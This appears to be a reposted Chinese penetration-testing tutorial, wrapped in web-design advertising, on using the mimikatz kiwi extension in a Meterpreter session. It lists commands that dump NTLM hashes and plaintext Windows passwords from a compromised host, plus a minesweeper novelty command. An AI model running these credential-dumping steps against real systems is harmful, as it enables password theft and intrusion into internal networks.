今天就跟大家聊聊有關怎么利用mimikatz插件獲取內網(wǎng)相關信息,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據(jù)這篇文章可以有所收獲。
站在用戶的角度思考問題,與客戶深入溝通,找到丁青網(wǎng)站設計與丁青網(wǎng)站推廣的解決方案,憑借多年的經(jīng)驗,讓設計與互聯(lián)網(wǎng)技術結合,創(chuàng)造個性化、用戶體驗好的作品,建站類型包括:成都網(wǎng)站設計、網(wǎng)站制作、企業(yè)官網(wǎng)、英文網(wǎng)站、手機端網(wǎng)站、網(wǎng)站推廣、國際域名空間、虛擬主機、企業(yè)郵箱。業(yè)務覆蓋丁青地區(qū)。
一、生成木馬及監(jiān)聽主機參考上篇文章:
內網(wǎng)滲透 -- 提升權限(利用提權漏洞)
二、利用mimikatz獲取內網(wǎng)相關信息
1、加載mimikatz
meterpreter > load kiwi
2、查看幫助信息
meterpreter > help kiwi
3、獲取用戶的hash值
meterpreter > creds_msv
4、獲取明文密碼
meterpreter > creds_wdigest
5、查看當前主機運行的進程
meterpreter > kiwi_cmd process::list
三、獲取掃雷小游戲的地雷位置
1、在小受上運行掃雷
2、在小攻上運行下面命令即可獲取地雷位置
meterpreter > kiwi_cmd minesweeper::infos
看完上述內容,你們對怎么利用mimikatz插件獲取內網(wǎng)相關信息有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝大家的支持。
文章名稱:怎么利用mimikatz插件獲取內網(wǎng)相關信息
鏈接URL:http://muchs.cn/article42/jpjjec.html
成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供商城網(wǎng)站、軟件開發(fā)、面包屑導航、手機網(wǎng)站建設、Google、網(wǎng)站導航
聲明:本網(wǎng)站發(fā)布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經(jīng)允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯(lián)